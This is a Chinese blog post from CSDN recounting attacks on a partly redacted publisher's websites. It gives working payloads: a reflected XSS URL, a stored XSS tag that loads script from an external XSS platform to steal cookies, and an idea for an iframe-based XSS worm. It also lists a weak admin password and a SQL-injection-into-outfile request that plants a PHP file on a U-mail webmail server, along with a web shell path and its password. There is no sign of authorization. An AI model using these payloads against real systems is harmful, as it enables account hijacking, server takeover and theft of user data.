实战挖掘某出版社漏洞集合

最新推荐文章于 2024-07-09 23:47:49 发布
最新推荐文章于 2024-07-09 23:47:49 发布
阅读量675 收藏
点赞数
分类专栏: 红蓝对抗 文章标签: php web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XunanSec/article/details/125002061
版权

0x00 前言

之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。

0x01 主站XSS

主页搜索框,发现是get传参

http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E

个人中心XSS可打Cookie

基本资料,昵称处限制了长度,直接插入payload

<sCRiPt sRC=http://xss.pt/xxxx></sCrIpT>

下面这张图截错了,修改了昵称后就没法修改了所以没有新图可截,直接在昵称插入payload保存即可

访问个人中心
昵称处已经空了

http://www.*****.com/blog/2342589/taokejian.htm


结合前台搜索框get型xss,iframe框架隐藏嵌入我的主页链接到搜索框中,传播即可造成xss蠕虫

0x02 分站XSS

http://zy.*****.com/sp/getp****p.do

搜索框 弹一下 没啥卵用

0x03 某资源管理平台弱密码

弱口令就进去了

http://x***ewm.*****.com/index        admin   123456

0x04 邮箱系统SQL注入&Getshell&远程代码执行

U-mail挺老的邮件系统了,很多洞,经过测试,通过注入into outfile拿到shell

http://mail.*****.com/

1. 信息泄露

http://mail.*****.com/webmail/customer/autoresp.php
路径泄露:D:\umail\WorldClient\html\userapply.php
info:http://mail.*****.com//webmail/info.php

2. 注入写木马测试

aa’ union select 1,2,3,4,5,6,'<?php echo 
phpinfo();?>’,8,9,10,11,12,13,14 into outfile 
‘D:/umail/WorldClient/html/src.php’#

上面语句base64转码

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

访问:

http://mail.*****.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

3. getshell

http://mail.*****.com/webmail/sss.php        密码g

win2008  network service 可秒system,就到这了没再继续了。

巡安似海
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
大学网站沦陷之Journal报刊系统Fckeditor-0day
叱诧冰子 ′
01-24 1582
<br />影响版本:JournalX 2.0  <br />官方网站:http://www.magtech.com.cn<br />产品介绍:<br />JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。<br />google or baidu 关键字:inurl:volumn/current_abs.shtml<br />因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。<br />在Web根
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程,还有大量QQ邮箱的XSS和各种XSS漏洞实战解析哦!
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
高级二进制漏洞挖掘
02-19
讲师有着多年的渗透测试、逆向工程、病毒分析、移动安全、工控安全等领域的相关项目经验。同时讲师还对多所大学以及企业、事业进行过系统化培训。本课程从零基础开始教学,带领学员们进入二进制安全的世界。本课程包括基础的代码基础、漏洞原理、漏洞挖掘工具以及方法。本课程拥有多个实战教学让学员们从实战中学习二进制漏洞挖掘
MDaemon补丁公告-MD011221
上海云璨的博客
03-10 227
MDaemon Technologies开发团队已经构建并测试了一个补丁,以纠正MDaemon远程管理和Webmail(Worldclient)中的一个潜在漏洞,此漏洞可能会影响所有浏览器类型。此安全更新是针对MDaemon电子邮件服务器16.0-20.0版本。 只需下载并安装此中列出的相应补丁即可(补丁下载)。 不需要更新您的许可来获得补丁。不过,我们鼓励使用较早、不受支持的MDaemon版本的用户升级到最新版本,以确保他们拥有最新的补丁和安全更新。 ...
《0day安全:软件漏洞分析技术第二版》
leeeryan
01-11 6221
简单说来,这次再版的原因有二: 首先,国人深知与时俱进的道理,技术上面更是如此。随着windows平台保护技术的不断改进,win7的广泛使用,第一版中所述的很多方法已有较大局限。为此我们逐一搜集了近年来各类安全峰会上的前沿文章,读懂消化之后将其重绘于书中。可以说我们在这次再版中逐一讲述并总结了目前世界上windows 平台下几乎所有最前沿的内存exploit技术。时效性是再版的重要原因。 然后,第一版的编纂始于我求学阶段的一个简单的冲动:把手头所有的文档手稿编纂成册与大家分享。限于本人学识有限
SRC漏洞挖掘实战经验总结
10-28
本篇文章将基于"SRC漏洞挖掘实战经验总结"的主题,深入探讨相关知识点。 一、SRC漏洞挖掘的基本概念 SRC,即安全响应中心,是企业或组织为了管理和处理安全事件设立的专门机构。漏洞挖掘则是SRC的核心任务之一,...
国内SRC漏洞挖掘技巧与经验分享
01-29
总结来说,国内SRC漏洞挖掘需要结合技术分析与经验积累,通过多方面信息收集、深度漏洞分析、代码审计、Web应用漏洞挖掘、安全配置检查、社会工程学以及持续学习,才能在这一领域取得显著成效。希望这份经验分享能对...
国内SRC漏洞挖掘经验和技巧分享.pdf
09-10
"SRC漏洞挖掘经验和技巧分享" 本文档主要分享了SRC漏洞挖掘的经验和技巧,涵盖了SRC个人推荐、SRC的规则、漏洞挖掘中的个人经验和技巧分享等方面。 一、SRC个人推荐 SRC个人推荐排名不分先后,只为排版好看白帽子...
【推荐】网络安全中的漏洞挖掘实践合集.zip
09-03
推荐,网络安全中的漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制...
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载,,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
视频教程-Web渗透测试之SRC挖掘经验分享-渗透测试
weixin_34597897的博客
05-28 1348
Web渗透测试之SRC挖掘经验分享 互联网公司安全攻防专家,世界五百强央企高...
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3268
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
(2023版)零基础入门网络安全/Web安全,收藏这一篇就够了
bigbangbangbang1的博客
03-24 249
废话不多说,先上一张图镇楼,看看网络安全有哪些方向,它们之间有什么关系和区别,各自需要学习哪些东西。在这个圈子技术门类中,工作岗位主要有以下三个方向:安全研发安全研究:二进制方向安全研究:网络渗透方向下面逐一说明一下。
漏洞挖掘分析技术综述(转)
天若有情 -- 追梦人
03-04 2457
漏洞挖掘分析技术综述(转)1 引言    网络安全已成为人们日益关注的重要问题。据CNCERT/CC2007年网络安全工作报告[1]的统计,近年来漏洞数量呈现明显上升趋势,不仅如此,新漏洞从公布到被利用的时间越来越短,黑客对发布的漏洞信息进行分析研究,往往在极短时间内就能成功利用这些漏洞。除了利用已知漏洞,黑客们也善于挖掘并利用一些尚未公布的漏洞,发起病毒攻击,或出售漏洞资料,满足经济目的
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
liaomin416100569的专栏
12-13 9922
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
双11三连击 之 131个现金红包任性送
Ms08067安全实验室
11-07 85
Fun肆双十一,惊喜狂欢享2022.11.07-11.13— 实验室旗下直播培训课程 —惊喜一:新学员购买以上任意一门直播课程赠送任意一个MS08067知识星球(6选1),多买多送。报两门课程额外再减200元,三门课程减300元,以此类推。惊喜二:老学员及星球成员(限2022.11.6号前加入)购买以上任意一门直播课程立减200元,二门课程立减400元,以此类推。且报两门课程再赠送任意一个知识...
什么是RPC?有哪些RPC框架?
最新发布
yuiezt的专栏
07-09 1849
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
web漏洞挖掘 实战
08-29
Web漏洞挖掘是一项重要的安全工作,可以帮助发现和修复Web应用程序中存在的潜在漏洞。以下是一些实战中常用的Web漏洞挖掘方法: 1. 信息收集:收集关于目标应用程序的信息,包括架构、技术栈、可用端点等。 2. 扫描和映射:使用自动化工具(如Burp Suite、Nessus)扫描目标应用程序,识别潜在的漏洞点,并进行应用程序映射。 3. 注入攻击:通过输入恶意数据,检查应用程序是否容易受到SQL注入、命令注入或其他注入类攻击。 4. 跨站脚本攻击(XSS):尝试在用户输入点或其他可注入脚本的位置插入恶意脚本,以执行未经授权的操作。 5. 跨站请求伪造(CSRF):检查应用程序是否存在缺乏适当身份验证和授权机制,以防止来自恶意网站的伪造请求。 6. 文件包含漏洞:检查应用程序是否存在可用于包含远程文件的漏洞,从而可能导致代码执行或敏感信息泄露。 7. 不安全的直接对象引用(IDOR):尝试直接访问应用程序中的资源,绕过身份验证和授权检查,查看是否存在未受保护的敏感信息。 8. 服务器配置错误:检查目标服务器的配置文件,查看是否存在敏感信息泄露、目录列表、不安全的HTTP方法等问题。 9. 逻辑漏洞:检查应用程序的业务逻辑,寻找可能导致未经授权的访问或敏感信息泄露的逻辑错误。 10. 漏洞利用和验证:对发现的漏洞进行进一步测试和验证,并编写详细的报告,以便开发人员能够修复这些漏洞。 请注意,进行Web漏洞挖掘需要合法授权和合规性,任何未经授权的活动都是违法的。建议在进行漏洞挖掘之前,与相关业主或法定所有者协商和获得明确的许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值